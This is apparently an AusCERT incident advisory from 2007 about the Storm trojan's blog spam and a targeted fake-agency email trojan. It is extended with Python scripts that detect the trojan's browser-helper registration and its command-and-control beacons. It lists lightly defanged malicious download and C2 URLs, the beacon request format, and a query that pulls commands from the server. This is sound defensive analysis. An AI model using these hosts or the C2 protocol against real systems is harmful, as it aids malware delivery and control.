Australia's Leading Computer Emergency Response Team

Trojan Activity
Date: 31 August 2007
Original URL: http://www.auscert.org.au/render.html?cid=7066&it=8032

More Storm



Today we were advised that the Storm Trojan, which is responsible for the
ecard and youtube emails, is now "blogging". The blog posts carry the same
subjects and messages we have all become familiar with. They are posted via
the mail-to-blogger feature, which lets bloggers publish their latest web log
entry by sending it as an email. We noticed while digging that these blog posts
tend to sit among lots of other spam posts. With some further digging, we found
that the Storm Trojan appears to have been doing this for a while: one blog post
dates back to June 30, 2007.

[Screenshot: blog post from Storm]

The link points to one of the Storm nodes which, when visited from a web
browser, attempts to exploit browser vulnerabilities chosen according to the
User-Agent header. If the node has no known exploit for that User-Agent, it
returns a plain HTML document containing a direct link to the executable.


Australian Office of Fair Trade Trojan



Although the name has a legitimate ring to it, it is important to point out
that there is no such organisation in Australia. The trojan appears to be a
very targeted social engineering attempt: the email contains the correct "To"
email address and the user's correct name.

The original piece of malware arrives as an email attachment with a DOC
extension. The malware is embedded in this file and displays a PDF icon;
when executed, it downloads another piece of malware from:

hxxp :// zpnphoto.com / down.php

down.php then attempts to place a file named "yhelp.dll" in the system root directory,
usually C:\WINDOWS. The DLL is injected into any currently running Internet
Explorer processes, and the malware then registers a Browser Helper Object called
"Yahoo! Helper" under the CLSID "{E838FBB2-574D-4926-9C81-CCB15F3A3F53}".
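The BHO registration is the host-side indicator a responder can sweep for. The following Python triage script is an added example, not part of the AusCERT write-up: it parses a Windows .reg export of the Browser Helper Objects key and the CLSID classes (a constructed sample is embedded below) and flags any BHO that matches the CLSID, display name or DLL name given above. The "DLL in the Windows directory" heuristic is my own assumption, not something the write-up states, and the benign helper in the sample is invented.

```python
import re

# Host indicators taken from the write-up: the BHO's CLSID, display name and DLL.
KNOWN_BHO_CLSID = "{E838FBB2-574D-4926-9C81-CCB15F3A3F53}"
KNOWN_BHO_NAME = "Yahoo! Helper"
KNOWN_DLL_NAME = "yhelp.dll"

# Where Internet Explorer enumerates BHOs, and where their COM servers are registered.
BHO_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects"
CLSID_ROOTS = (r"HKEY_CLASSES_ROOT\CLSID", r"HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID")

SECTION_RE = re.compile(r"^\[(.+)\]\s*$")
DEFAULT_VALUE_RE = re.compile(r'^@="(.*)"\s*$')


def parse_reg_export(text):
    """Parse a .reg export into {key path: default REG_SZ value or None}.

    Only the default (@) string value is kept; that is all a BHO lookup needs.
    """
    keys = {}
    current = None
    for line in text.splitlines():
        section = SECTION_RE.match(line)
        if section:
            current = section.group(1)
            keys[current] = None
            continue
        value = DEFAULT_VALUE_RE.match(line)
        if value and current is not None:
            # .reg files escape backslashes inside string data
            keys[current] = value.group(1).replace("\\\\", "\\")
    return keys


def lookup_clsid(keys, clsid, subkey=""):
    """Return the default value of CLSID\\{clsid}[\\subkey] under either classes root."""
    for root in CLSID_ROOTS:
        path = root + "\\" + clsid + ("\\" + subkey if subkey else "")
        if path in keys:
            return keys[path] or ""
    return ""


def find_suspicious_bhos(reg_text):
    """List registered BHOs that match the indicators or load from the Windows directory."""
    keys = parse_reg_export(reg_text)
    findings = []
    for path in keys:
        parent, _, clsid = path.rpartition("\\")
        if not parent.upper().endswith(BHO_KEY.upper()) or not clsid.startswith("{"):
            continue
        name = lookup_clsid(keys, clsid)
        dll = lookup_clsid(keys, clsid, "InprocServer32")
        dll_dir, _, dll_file = dll.rpartition("\\")
        reasons = []
        if clsid.upper() == KNOWN_BHO_CLSID:
            reasons.append("known CLSID")
        if name == KNOWN_BHO_NAME:
            reasons.append("known display name")
        if dll_file.lower() == KNOWN_DLL_NAME:
            reasons.append("known DLL name")
        # Heuristic (my assumption, not from the write-up): legitimate BHOs install
        # under an application folder, not directly in the Windows directory.
        if dll_dir.lower() in ("c:\\windows", "c:\\winnt"):
            reasons.append("DLL dropped in the Windows directory")
        if reasons:
            findings.append({"clsid": clsid, "name": name, "dll": dll, "reasons": reasons})
    return findings


# Constructed sample export: one invented benign BHO plus the one described above.
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AAAAAAAA-1111-2222-3333-444444444444}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E838FBB2-574D-4926-9C81-CCB15F3A3F53}]

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-1111-2222-3333-444444444444}]
@="Example Benign Helper"

[HKEY_CLASSES_ROOT\CLSID\{AAAAAAAA-1111-2222-3333-444444444444}\InprocServer32]
@="C:\\Program Files\\Example\\helper.dll"

[HKEY_CLASSES_ROOT\CLSID\{E838FBB2-574D-4926-9C81-CCB15F3A3F53}]
@="Yahoo! Helper"

[HKEY_CLASSES_ROOT\CLSID\{E838FBB2-574D-4926-9C81-CCB15F3A3F53}\InprocServer32]
@="C:\\WINDOWS\\yhelp.dll"
"""

if __name__ == "__main__":
    for f in find_suspicious_bhos(SAMPLE_REG_EXPORT):
        print(f["clsid"], f["name"], f["dll"], "; ".join(f["reasons"]))
```

On a live machine the same export is produced with `reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects" bho.reg` plus an export of `HKCR\CLSID`; on 64-bit systems the Wow6432Node copy of the BHO key is matched too, since the check only looks at the key suffix.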

The malware then retrieves updates, new malware or commands from a website
using HTTP requests of the form:

POST /OOO3/parse.php?user=[COMPUTER-NAME]_[USER]&mod=log

Interestingly, if you modify this command to GET the following URL:

hxxp :// 203,121,69,232 /OOO3/parse.php?user=TU-4NH09SMCG1HC_Administrator&mod=cmd

the server returns:

$ @:1:2: @:2:3: @:4:1:hxxp :// evanscomm.ca /cp/2.exe

Note: the URLs have been obfuscated.
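The beacon URI and the command response format above give a network-side indicator. The following Python script is an added example, not part of the AusCERT write-up: it scans proxy log lines for requests to the /OOO3/parse.php path, recovers the infected computer name and account from the user= parameter, and pulls download URLs out of a mod=cmd response so they can be blocked. The Squid native access.log layout is assumed for the log lines, which are constructed, as are the 203.0.113.10 server address, the payload-host.example domain and the WKSTN-07 host; the meaning of the numeric fields in the command response is not documented in the write-up, so the code does not interpret them.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Beacon described in the write-up: POST /OOO3/parse.php?user=[COMPUTER-NAME]_[USER]&mod=log
BEACON_PATH = "/OOO3/parse.php"
BEACON_MODES = {"log", "cmd"}

# Squid native access.log (assumed format):
# time elapsed client code/status bytes method URL ident hierarchy/from type
SQUID_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)"
)
URL_RE = re.compile(r"https?://\S+")


def match_beacon(url):
    """Return {'host','computer','user','mode'} if the URL is a C2 beacon, else None."""
    parts = urlsplit(url)
    if parts.path != BEACON_PATH:
        return None
    qs = parse_qs(parts.query)
    user = qs.get("user", [""])[0]
    mode = qs.get("mod", [""])[0]
    if not user or mode not in BEACON_MODES:
        return None
    # Assumption: the computer name precedes the first underscore
    computer, _, account = user.partition("_")
    return {"host": parts.hostname, "computer": computer, "user": account, "mode": mode}


def find_infected_hosts(log_lines):
    """Scan proxy log lines and return {client_ip: details} for hosts beaconing to the C2 path."""
    hits = defaultdict(lambda: {"computer": None, "user": None, "c2_hosts": set(), "beacons": 0})
    for line in log_lines:
        m = SQUID_RE.match(line)
        if not m:
            continue
        beacon = match_beacon(m.group("url"))
        if beacon is None:
            continue
        rec = hits[m.group("client")]
        rec["computer"], rec["user"] = beacon["computer"], beacon["user"]
        rec["c2_hosts"].add(beacon["host"])
        rec["beacons"] += 1
    return dict(hits)


def extract_payload_urls(cmd_response):
    """Pull download URLs out of a mod=cmd response shaped like '$ @:1:2: @:2:3: @:4:1:http://...'.

    The numeric fields are not documented in the write-up, so only the URLs are extracted.
    """
    if not cmd_response.lstrip().startswith("$"):
        return []
    return URL_RE.findall(cmd_response)


# Constructed sample log: two infected clients and one clean one.
SAMPLE_LOG = """\
1188519303.123     45 10.0.0.12 TCP_MISS/200 512 POST http://203.0.113.10/OOO3/parse.php?user=TU-4NH09SMCG1HC_Administrator&mod=log - DIRECT/203.0.113.10 text/html
1188519310.456     12 10.0.0.33 TCP_HIT/200 2048 GET http://www.example.com/index.html - DIRECT/93.184.216.34 text/html
1188519363.789     40 10.0.0.12 TCP_MISS/200 80 GET http://203.0.113.10/OOO3/parse.php?user=TU-4NH09SMCG1HC_Administrator&mod=cmd - DIRECT/203.0.113.10 text/plain
1188519400.001     30 10.0.0.51 TCP_MISS/200 64 POST http://203.0.113.10/OOO3/parse.php?user=WKSTN-07_jsmith&mod=log - DIRECT/203.0.113.10 text/html
"""

# Constructed command response in the format shown above, with a placeholder payload host.
SAMPLE_CMD_RESPONSE = "$ @:1:2: @:2:3: @:4:1:http://payload-host.example/cp/2.exe"

if __name__ == "__main__":
    for ip, rec in sorted(find_infected_hosts(SAMPLE_LOG.splitlines()).items()):
        print(ip, rec["computer"], rec["user"], rec["beacons"], sorted(rec["c2_hosts"]))
    print("block:", extract_payload_urls(SAMPLE_CMD_RESPONSE))
```

The user= parameter is what makes this useful for incident response: the beacon carries the machine and account names, so a single proxy log search yields the host list to isolate without touching the endpoints first.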

This binary is different from the "down.php" binary but is detected under the
same names by AV vendors, including Trojan-Penta.B and Fireming.

Cheers
Zane